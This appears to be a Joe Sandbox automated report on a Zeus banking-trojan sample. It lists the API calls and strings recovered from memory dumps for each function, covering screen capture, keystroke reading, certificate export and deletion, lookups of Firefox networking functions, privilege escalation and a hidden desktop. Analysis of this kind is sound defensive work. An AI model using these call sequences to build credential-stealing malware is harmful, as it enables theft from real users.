
Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Non-executed Functions

Function 003BEA11, Relevance: 82.6, APIs: 27, Strings: 20, Instructions: 389

APIs

LoadLibraryA.KERNEL32(gdiplus.dll), ref: 003BEA43
GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 003BEA54
GetProcAddress.KERNEL32(00000000,GdiplusShutdown), ref: 003BEA61
GetProcAddress.KERNEL32(00000000,GdipCreateBitmapFromHBITMAP), ref: 003BEA6E
GetProcAddress.KERNEL32(00000000,GdipDisposeImage), ref: 003BEA7B
GetProcAddress.KERNEL32(00000000,GdipGetImageEncodersSize), ref: 003BEA88
GetProcAddress.KERNEL32(00000000,GdipGetImageEncoders), ref: 003BEA95
GetProcAddress.KERNEL32(00000000,GdipSaveImageToStream), ref: 003BEAA2
LoadLibraryA.KERNEL32(ole32.dll), ref: 003BEAEA
GetProcAddress.KERNEL32(00000000,CreateStreamOnHGlobal), ref: 003BEAF5
LoadLibraryA.KERNEL32(gdi32.dll), ref: 003BEB07
GetProcAddress.KERNEL32(00000000,CreateDCW), ref: 003BEB12
GetProcAddress.KERNEL32(00000000,CreateCompatibleDC), ref: 003BEB1E
GetProcAddress.KERNEL32(00000000,CreateCompatibleBitmap), ref: 003BEB2B
GetProcAddress.KERNEL32(00000000,GetDeviceCaps), ref: 003BEB38
GetProcAddress.KERNEL32(00000000,SelectObject), ref: 003BEB45
GetProcAddress.KERNEL32(00000000,BitBlt), ref: 003BEB52
GetProcAddress.KERNEL32(00000000,DeleteObject), ref: 003BEB5F
GetProcAddress.KERNEL32(00000000,DeleteDC), ref: 003BEB6C
LoadImageW.USER32(00000000,00007F00,00000002,00000000,00000000,00008040), ref: 003BEC10
GetIconInfo.USER32(00000000,?), ref: 003BEC25
GetCursorPos.USER32(?), ref: 003BEC33
DrawIcon.USER32(?,?,?,?), ref: 003BED04

Part of subcall function 003C338B: HeapAlloc.KERNEL32(00000008,-00000004,003C4B59,00000000,?,?,?,003C1E08,00000000,003C22ED,?,?,00000000), ref: 003C339C

lstrcmpiW.KERNEL32(?,-00000030), ref: 003BED85

Part of subcall function 003C33BB: HeapFree.KERNEL32(00000000,00000000,003C4BB2), ref: 003C33CE

FreeLibrary.KERNEL32(00000000), ref: 003BEE9C
FreeLibrary.KERNEL32(?), ref: 003BEEA6
FreeLibrary.KERNEL32(00000000), ref: 003BEEB0

Strings

CreateDCW, xrefs: 003BEB09
gdiplus.dll, xrefs: 003BEA25
DISPLAY, xrefs: 003BEBDE
DeleteDC, xrefs: 003BEB61
GdipDisposeImage, xrefs: 003BEA70
GdipGetImageEncoders, xrefs: 003BEA8A
GdiplusShutdown, xrefs: 003BEA56
GdipGetImageEncodersSize, xrefs: 003BEA7D
CreateCompatibleDC, xrefs: 003BEB14
SelectObject, xrefs: 003BEB3A
GdiplusStartup, xrefs: 003BEA4B
DeleteObject, xrefs: 003BEB54
GetDeviceCaps, xrefs: 003BEB2D
GdipCreateBitmapFromHBITMAP, xrefs: 003BEA63
GdipSaveImageToStream, xrefs: 003BEA97
CreateCompatibleBitmap, xrefs: 003BEB20
CreateStreamOnHGlobal, xrefs: 003BEAEC
gdi32.dll, xrefs: 003BEB02
ole32.dll, xrefs: 003BEAE5
BitBlt, xrefs: 003BEB47

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003C2D01, Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 243

APIs

Part of subcall function 003C85D0: CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000), ref: 003C85F5
Part of subcall function 003C85D0: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,003C2D27,?,?,00000000), ref: 003C8608
Part of subcall function 003C85D0: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,003C2D27,?,?,00000000), ref: 003C8630
Part of subcall function 003C85D0: ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 003C8648
Part of subcall function 003C85D0: VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,003C2D27,?,?,00000000), ref: 003C8662
Part of subcall function 003C85D0: CloseHandle.KERNEL32(?), ref: 003C866B

Part of subcall function 003C8678: VirtualFree.KERNEL32(?,00000000,00008000,00000000,003CC83B,?,?,.exe,00000000,00000000,?,.exe,00000006), ref: 003C8689
Part of subcall function 003C8678: CloseHandle.KERNEL32(?), ref: 003C8697

CreateMutexW.KERNEL32(003D2C30,00000001,?,32901130,?,00000001,?), ref: 003C2D91
GetLastError.KERNEL32 ref: 003C2DA3
CloseHandle.KERNEL32(000001E6), ref: 003C2DBA

Part of subcall function 003BE89E: RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Xyuxy,00000000,00000001,?,?,76C605D7,00000000), ref: 003BE8E0

Part of subcall function 003C31CC: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 003C31ED
Part of subcall function 003C31CC: Process32FirstW.KERNEL32(000001E6,?), ref: 003C3216
Part of subcall function 003C31CC: OpenProcess.KERNEL32(00000400,00000000,?,?,?,76C605D7,00000000), ref: 003C3271
Part of subcall function 003C31CC: CloseHandle.KERNEL32(00000000), ref: 003C328E
Part of subcall function 003C31CC: GetLengthSid.ADVAPI32(00000000,?,76C605D7,00000000), ref: 003C32A1
Part of subcall function 003C31CC: CloseHandle.KERNEL32(?), ref: 003C330E
Part of subcall function 003C31CC: Process32NextW.KERNEL32(000001E6,0000022C), ref: 003C331A
Part of subcall function 003C31CC: CloseHandle.KERNEL32(000001E6), ref: 003C332B

ExitWindowsEx.USER32(00000014,80000000), ref: 003C2DFD
OpenEventW.KERNEL32(00000002,00000000,?,1A43533F,?,00000001), ref: 003C2E1C
SetEvent.KERNEL32(00000000), ref: 003C2E29
CloseHandle.KERNEL32(00000000), ref: 003C2E30

Part of subcall function 003C2A32: CloseHandle.KERNEL32(003D2AF0), ref: 003C2AF2

CloseHandle.KERNEL32(000001E6), ref: 003C2E42
ReadProcessMemory.KERNEL32(000000FF,003E0014,00000002,00000001,00000000,?,19367401,?,00000001,8889347B,00000002), ref: 003C2EA6
Sleep.KERNEL32(000001F4), ref: 003C2EB8
IsWellKnownSid.ADVAPI32(0194F7D0,00000016,?,19367401,?,00000001,8889347B,00000002), ref: 003C2EC9
ReadProcessMemory.KERNEL32(000000FF,003E0014,00000000,00000001,00000000), ref: 003C2EF1
GetFileAttributesExW.KERNEL32({3FF5AE44-1EE1-8646-676C-E42BACAD1769},78F16360,0000000C), ref: 003C2F0D
VirtualFree.KERNEL32(?,00000000,00008000,?,00000001,?,?), ref: 003C2F50

Part of subcall function 003C97D0: VirtualProtect.KERNEL32(003CCA1A,?,00000040,00000000,003E0014,?,?,003C2F6C,?,?), ref: 003C97E5
Part of subcall function 003C97D0: VirtualProtect.KERNEL32(003CCA1A,?,00000000,00000000,?,?,003C2F6C,?,?), ref: 003C9818

CreateEventW.KERNEL32(003D2C30,00000001,00000000,?,1A43533F,?,00000001,00000001,?,00000000,C:\Users\admin\AppData\Roaming,00000000,?,?,?), ref: 003C2FCE
WaitForSingleObject.KERNEL32(?,000000FF), ref: 003C2FE7
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 003C2FF7
CloseHandle.KERNEL32(0000000C), ref: 003C300D
CloseHandle.KERNEL32(?), ref: 003C3013
CloseHandle.KERNEL32(?), ref: 003C3016

Part of subcall function 003C6B8E: ReleaseMutex.KERNEL32(00000000,003C3021,?,?,?), ref: 003C6B92

Part of subcall function 003CD0E6: LoadLibraryW.KERNEL32(?), ref: 003CD107
Part of subcall function 003CD0E6: GetProcAddress.KERNEL32(00000000,?), ref: 003CD128
Part of subcall function 003CD0E6: SHGetFolderPathW.SHELL32(00000000,00000007,000000FF,00000001,?), ref: 003CD159
Part of subcall function 003CD0E6: StrCmpNIW.SHLWAPI(?,?,00000000), ref: 003CD17C
Part of subcall function 003CD0E6: FreeLibrary.KERNEL32(00000000), ref: 003CD1A3
Part of subcall function 003CD0E6: NetUserEnum.NETAPI32(00000000,00000000,00000002,?,000000FF,0000000C,?,?), ref: 003CD1D9
Part of subcall function 003CD0E6: NetUserGetInfo.NETAPI32(00000000,?,00000017,?), ref: 003CD212
Part of subcall function 003CD0E6: NetApiBufferFree.NETAPI32(?,?,?), ref: 003CD2AB
Part of subcall function 003CD0E6: NetApiBufferFree.NETAPI32(?), ref: 003CD2BE
Part of subcall function 003CD0E6: SHGetFolderPathW.SHELL32(00000000,00008007,000000FF,00000001,?), ref: 003CD2E2

Part of subcall function 003C4E20: CharToOemW.USER32(?,?), ref: 003C4E35

Part of subcall function 003C6B9E: OpenMutexW.KERNEL32(00100000,00000000,00000000,003C2E87,?,19367401,?,00000001,8889347B,00000002), ref: 003C6BA9
Part of subcall function 003C6B9E: CloseHandle.KERNEL32(00000000), ref: 003C6BB4

Part of subcall function 003C33BB: HeapFree.KERNEL32(00000000,00000000,003C4BB2), ref: 003C33CE

Part of subcall function 003C2507: CreateMutexW.KERNEL32(003D2C30,00000000,?,?,?,?,?), ref: 003C2528

Part of subcall function 003CCCCF: StrCmpNIW.SHLWAPI(C:\Users\admin\AppData\Roaming,0194F800,00000000), ref: 003CCD57
Part of subcall function 003CCCCF: lstrcmpiW.KERNEL32(?,?,?,?,00000000), ref: 003CCD6F

Strings

C:\Users\admin\AppData\Roaming, xrefs: 003C2F35, 003C2F6C, 003C2F94
, xrefs: 003C2DD7
{3FF5AE44-1EE1-8646-676C-E42BACAD1769}, xrefs: 003C2F08

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003C70A1, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 52

APIs

LoadLibraryA.KERNEL32(cabinet.dll), ref: 003C70B5
GetProcAddress.KERNEL32(00000000,FCICreate,?,?,003C73A4,?,?,00000000,?), ref: 003C70D5
GetProcAddress.KERNEL32(FCIAddFile,?,003C73A4,?,?,00000000,?), ref: 003C70E7
GetProcAddress.KERNEL32(FCIFlushCabinet,?,003C73A4,?,?,00000000,?), ref: 003C70F9
GetProcAddress.KERNEL32(FCIDestroy,?,003C73A4,?,?,00000000,?), ref: 003C710B
HeapCreate.KERNEL32(00000000,00080000,00000000,003C73A4,?,?,00000000,?), ref: 003C7136
FreeLibrary.KERNEL32(003C73A4,?,?,00000000,?), ref: 003C714B

Strings

FCICreate, xrefs: 003C70CF
FCIAddFile, xrefs: 003C70D7
FCIFlushCabinet, xrefs: 003C70E9
FCIDestroy, xrefs: 003C70FB
cabinet.dll, xrefs: 003C70B0

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003C4CDD, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 90

APIs

LoadLibraryA.KERNEL32(userenv.dll), ref: 003C4CEE
GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock,00000000,?), ref: 003C4D0D
GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 003C4D19
CreateProcessAsUserW.ADVAPI32(?,00000000,003CC8F5,00000000,00000000,00000000,003CC8F5,003CC8F5,00000000,?,?,?,00000000,00000044), ref: 003C4D8A
CloseHandle.KERNEL32(?), ref: 003C4D9D
CloseHandle.KERNEL32(?), ref: 003C4DA2
FreeLibrary.KERNEL32(?), ref: 003C4DB9

Strings

DestroyEnvironmentBlock, xrefs: 003C4D0F
CreateEnvironmentBlock, xrefs: 003C4D07
userenv.dll, xrefs: 003C4CE6

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003C8AE4, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 109

APIs

Part of subcall function 003C8C40: PathCombineW.SHLWAPI(003C1F45,003C1F45,?), ref: 003C8C5F

FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 003C8B23
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 003C8B4A

Part of subcall function 003C8AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 003C8B94
Part of subcall function 003C8AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 003C8BC1
Part of subcall function 003C8AE4: Sleep.KERNEL32(00000000,?,?), ref: 003C8BF1

FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 003C8C1F
FindClose.KERNEL32(?,?,?,?,00000000), ref: 003C8C31

Strings

Fs<, xrefs: 003C8BF3
Fs<, xrefs: 003C8BBE

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003CD865, Relevance: 15.1, APIs: 10, Instructions: 92

APIs

OpenWindowStationW.USER32(?,00000000,10000000), ref: 003CD88A
CreateWindowStationW.USER32(?,00000000,10000000,00000000), ref: 003CD89D
GetProcessWindowStation.USER32 ref: 003CD8AE

Part of subcall function 003CD83D: GetProcessWindowStation.USER32 ref: 003CD841
Part of subcall function 003CD83D: SetProcessWindowStation.USER32(00000000), ref: 003CD855

OpenDesktopW.USER32(?,00000000,00000000,10000000), ref: 003CD8E9
CreateDesktopW.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 003CD8FD
GetCurrentThreadId.KERNEL32(?,?,?,003B731A,?,2937498D,?,00000000), ref: 003CD909
GetThreadDesktop.USER32(00000000), ref: 003CD910

Part of subcall function 003CD7F8: lstrcmpiW.KERNEL32(00000000,00000000,00000000,?,00000000,10000000,00000000,003CD84D,00000000,?,?,?,003B731A,?,2937498D,?), ref: 003CD81D

SetThreadDesktop.USER32(00000000), ref: 003CD922
CloseDesktop.USER32(00000000), ref: 003CD934
CloseWindowStation.USER32(?), ref: 003CD94F

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003CAEFC, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109

APIs

TranslateMessage.USER32(?), ref: 003CB053

Part of subcall function 003C262D: WaitForSingleObject.KERNEL32(00000000,003B776D), ref: 003C2635

EnterCriticalSection.KERNEL32(003D3FB4), ref: 003CAF36
LeaveCriticalSection.KERNEL32(003D3FB4), ref: 003CAFD9

Part of subcall function 003BEA11: LoadLibraryA.KERNEL32(gdiplus.dll), ref: 003BEA43
Part of subcall function 003BEA11: GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 003BEA54
Part of subcall function 003BEA11: GetProcAddress.KERNEL32(00000000,GdiplusShutdown), ref: 003BEA61
Part of subcall function 003BEA11: GetProcAddress.KERNEL32(00000000,GdipCreateBitmapFromHBITMAP), ref: 003BEA6E
Part of subcall function 003BEA11: GetProcAddress.KERNEL32(00000000,GdipDisposeImage), ref: 003BEA7B
Part of subcall function 003BEA11: GetProcAddress.KERNEL32(00000000,GdipGetImageEncodersSize), ref: 003BEA88
Part of subcall function 003BEA11: GetProcAddress.KERNEL32(00000000,GdipGetImageEncoders), ref: 003BEA95
Part of subcall function 003BEA11: GetProcAddress.KERNEL32(00000000,GdipSaveImageToStream), ref: 003BEAA2
Part of subcall function 003BEA11: LoadLibraryA.KERNEL32(ole32.dll), ref: 003BEAEA
Part of subcall function 003BEA11: GetProcAddress.KERNEL32(00000000,CreateStreamOnHGlobal), ref: 003BEAF5
Part of subcall function 003BEA11: LoadLibraryA.KERNEL32(gdi32.dll), ref: 003BEB07
Part of subcall function 003BEA11: GetProcAddress.KERNEL32(00000000,CreateDCW), ref: 003BEB12
Part of subcall function 003BEA11: GetProcAddress.KERNEL32(00000000,CreateCompatibleDC), ref: 003BEB1E
Part of subcall function 003BEA11: GetProcAddress.KERNEL32(00000000,CreateCompatibleBitmap), ref: 003BEB2B
Part of subcall function 003BEA11: GetProcAddress.KERNEL32(00000000,GetDeviceCaps), ref: 003BEB38
Part of subcall function 003BEA11: GetProcAddress.KERNEL32(00000000,SelectObject), ref: 003BEB45
Part of subcall function 003BEA11: GetProcAddress.KERNEL32(00000000,BitBlt), ref: 003BEB52
Part of subcall function 003BEA11: GetProcAddress.KERNEL32(00000000,DeleteObject), ref: 003BEB5F
Part of subcall function 003BEA11: FreeLibrary.KERNEL32(00000000), ref: 003BEE9C
Part of subcall function 003BEA11: FreeLibrary.KERNEL32(?), ref: 003BEEA6
Part of subcall function 003BEA11: FreeLibrary.KERNEL32(00000000), ref: 003BEEB0

GetTickCount.KERNEL32(?,0000001E,000001F4), ref: 003CAF9B

Part of subcall function 003C40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 003C40CF

GetKeyboardState.USER32(?), ref: 003CAFF3
ToUnicode.USER32(0000001B,?,?,?,00000009,00000000), ref: 003CB01B

Part of subcall function 003CAD5F: EnterCriticalSection.KERNEL32(003D3FB4,?,?,?,003CB052,?), ref: 003CAD7C
Part of subcall function 003CAD5F: LeaveCriticalSection.KERNEL32(003D3FB4,?,?,?,003CB052,?), ref: 003CAD9D
Part of subcall function 003CAD5F: EnterCriticalSection.KERNEL32(003D3FB4,?,?,?,?,003CB052,?), ref: 003CADAE
Part of subcall function 003CAD5F: LeaveCriticalSection.KERNEL32(003D3FB4,?,?,?,003CB052,?), ref: 003CAE47

Strings

, xrefs: 003CB039

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003CC5CA, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 64

APIs

Part of subcall function 003C262D: WaitForSingleObject.KERNEL32(00000000,003B776D), ref: 003C2635

LdrGetDllHandle.NTDLL(?,00000000,?,?), ref: 003CC5ED
EnterCriticalSection.KERNEL32(Function_0002400C), ref: 003CC620
lstrcmpiW.KERNEL32(?,nspr4.dll), ref: 003CC640
lstrcmpiW.KERNEL32(?,nss3.dll), ref: 003CC64C

Part of subcall function 003BC103: GetModuleHandleW.KERNEL32(nss3.dll,00000000,76C619C1,00000000,003C20A9), ref: 003BC111
Part of subcall function 003BC103: GetProcAddress.KERNEL32(00000000,PR_OpenTCPSocket,00000000,76C619C1,00000000,003C20A9), ref: 003BC125
Part of subcall function 003BC103: GetProcAddress.KERNEL32(00000000,PR_Close), ref: 003BC132
Part of subcall function 003BC103: GetProcAddress.KERNEL32(00000000,PR_Read), ref: 003BC13F
Part of subcall function 003BC103: GetProcAddress.KERNEL32(00000000,PR_Write), ref: 003BC14C

LeaveCriticalSection.KERNEL32(Function_0002400C), ref: 003CC669

Strings

nss3.dll, xrefs: 003CC646
nspr4.dll, xrefs: 003CC63A

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003C69AA, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57

APIs

InitializeSecurityDescriptor.ADVAPI32(003D2C3C,00000001,00000000,003C22ED,?,?,00000000), ref: 003C69B4
SetSecurityDescriptorDacl.ADVAPI32(003D2C3C,00000001,00000000,00000000,?,?,00000000), ref: 003C69C5
ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 003C69DB
GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,?,?,?,00000000), ref: 003C69F7
SetSecurityDescriptorSacl.ADVAPI32(003D2C3C,?,?,?,?,?,00000000), ref: 003C6A0B
LocalFree.KERNEL32(00000000,?,?,00000000), ref: 003C6A18

Strings

S:(ML;;NRNWNX;;;LW), xrefs: 003C69D6

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 0041D486, Relevance: 12.1, APIs: 8, Instructions: 119

APIs

CertOpenSystemStoreW.CRYPT32(00000000,00404BBC,?,00000000,00000001), ref: 0041D4A1
CertEnumCertificatesInStore.CRYPT32(00000000,00000000,?,00000000,00000001), ref: 0041D4BD
CertEnumCertificatesInStore.CRYPT32(?,00000000,?,00000000,00000001), ref: 0041D4C9
PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004,?,00000000,00000001), ref: 0041D508

Part of subcall function 0041338B: HeapAlloc.KERNEL32(00000008,-00000004,00414B59,00000000,?,?,?,00411E08,00000000,004122ED,?,?,00000000), ref: 0041339C

PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004,?,00000000,00000001), ref: 0041D538
CharLowerW.USER32 ref: 0041D556
GetSystemTime.KERNEL32(?,?,?,00000000,00000001), ref: 0041D561

Part of subcall function 0041D42A: GetUserNameExW.SECUR32(00000002,?,00000001,?,?,?,0041D581,?,?,00000000), ref: 0041D43F

Part of subcall function 004140AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 004140CF

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

CertCloseStore.CRYPT32(?,00000000), ref: 0041D5EA

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003CD486, Relevance: 12.1, APIs: 8, Instructions: 119

APIs

CertOpenSystemStoreW.CRYPT32(00000000,003B4BBC,?,00000000,00000001), ref: 003CD4A1
CertEnumCertificatesInStore.CRYPT32(00000000,00000000,?,00000000,00000001), ref: 003CD4BD
CertEnumCertificatesInStore.CRYPT32(?,00000000,?,00000000,00000001), ref: 003CD4C9
PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004,?,00000000,00000001), ref: 003CD508

Part of subcall function 003C338B: HeapAlloc.KERNEL32(00000008,-00000004,003C4B59,00000000,?,?,?,003C1E08,00000000,003C22ED,?,?,00000000), ref: 003C339C

PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004,?,00000000,00000001), ref: 003CD538
CharLowerW.USER32 ref: 003CD556
GetSystemTime.KERNEL32(?,?,?,00000000,00000001), ref: 003CD561

Part of subcall function 003CD42A: GetUserNameExW.SECUR32(00000002,?,00000001,?,?,?,003CD581,?,?,00000000), ref: 003CD43F

Part of subcall function 003C40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 003C40CF

Part of subcall function 003C33BB: HeapFree.KERNEL32(00000000,00000000,003C4BB2), ref: 003C33CE

CertCloseStore.CRYPT32(?,00000000), ref: 003CD5EA

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003C4A87, Relevance: 10.6, APIs: 7, Instructions: 52

APIs

GetCurrentThread.KERNEL32(00000020,00000000,003CC9A1,00000000,?,?,?,?,003CC9A1,SeTcbPrivilege), ref: 003C4A97
OpenThreadToken.ADVAPI32(00000000,?,?,?,?,003CC9A1,SeTcbPrivilege), ref: 003C4A9E
OpenProcessToken.ADVAPI32(000000FF,00000020,003CC9A1,?,?,?,?,003CC9A1,SeTcbPrivilege), ref: 003C4AB0
LookupPrivilegeValueW.ADVAPI32(00000000,003CC9A1,?), ref: 003C4AD4
AdjustTokenPrivileges.ADVAPI32(003CC9A1,00000000,00000001,00000000,00000000,00000000), ref: 003C4AE9
GetLastError.KERNEL32 ref: 003C4AF3
CloseHandle.KERNEL32(003CC9A1), ref: 003C4B02

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003B6010, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 189

APIs

GetTickCount.KERNEL32(0000271B,00020000,00000000,00002719,00020000,00000000,00000000,000000FF,00000000), ref: 003B610F
GetUserNameExW.SECUR32(00000002,?,00000104), ref: 003B61E6

Part of subcall function 003B70A6: GetVersionExW.KERNEL32(?,?,00000000,00000006), ref: 003B70CA
Part of subcall function 003B70A6: GetNativeSystemInfo.KERNEL32(?), ref: 003B70D8

GetUserDefaultUILanguage.KERNEL32(0000271C,00020000,?,00000000,000000FF,00000000), ref: 003B6162
GetModuleFileNameW.KERNEL32(00000000,?,00000103,00000000,000000FF,00000000), ref: 003B61A4

Part of subcall function 003C33BB: HeapFree.KERNEL32(00000000,00000000,003C4BB2), ref: 003C33CE

Part of subcall function 003C34BD: GetSystemTime.KERNEL32(?,?,?,003B60C8,00000000,000000FF,00000000), ref: 003C34C7
Part of subcall function 003C34BD: SystemTimeToFileTime.KERNEL32(?,000000FF,?,?,003B60C8,00000000,000000FF,00000000), ref: 003C34D5

Part of subcall function 003C34E5: GetTimeZoneInformation.KERNEL32(?), ref: 003C34F4

Strings

, xrefs: 003B6218

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 0041D5FB, Relevance: 7.5, APIs: 5, Instructions: 36

APIs

CertOpenSystemStoreW.CRYPT32(00000000,00404BBC,?,00000001,00412C2A), ref: 0041D606
CertDuplicateCertificateContext.CRYPT32(00000000,?,?,00000001,00412C2A), ref: 0041D61F
CertDeleteCertificateFromStore.CRYPT32(00000000,?,?,00000001,00412C2A), ref: 0041D62A
CertEnumCertificatesInStore.CRYPT32(00000000,00000000,00000000,?,?,00000001,00412C2A), ref: 0041D632
CertCloseStore.CRYPT32(00000000,00000000,?,?,00000001,00412C2A), ref: 0041D63E

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003CD5FB, Relevance: 7.5, APIs: 5, Instructions: 36

APIs

CertOpenSystemStoreW.CRYPT32(00000000,003B4BBC,?,00000001,003C2C2A), ref: 003CD606
CertDuplicateCertificateContext.CRYPT32(00000000,?,?,00000001,003C2C2A), ref: 003CD61F
CertDeleteCertificateFromStore.CRYPT32(00000000,?,?,00000001,003C2C2A), ref: 003CD62A
CertEnumCertificatesInStore.CRYPT32(00000000,00000000,00000000,?,?,00000001,003C2C2A), ref: 003CD632
CertCloseStore.CRYPT32(00000000,00000000,?,?,00000001,003C2C2A), ref: 003CD63E

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003C4A30, Relevance: 6.0, APIs: 4, Instructions: 36

APIs

CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 003C4A3D
Thread32First.KERNEL32(00000000,?), ref: 003C4A58
Thread32Next.KERNEL32(00000000,0000001C), ref: 003C4A6E
CloseHandle.KERNEL32(00000000), ref: 003C4A79

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 004164FD, Relevance: 6.0, APIs: 4, Instructions: 32

APIs

socket.WS2_32(00000000,00000001,00000006), ref: 00416506
bind.WS2_32(00000000,?,-0000001D), ref: 00416526
listen.WS2_32(00000000,?), ref: 00416535
closesocket.WS2_32(00000000), ref: 00416540

Memory Dump Source

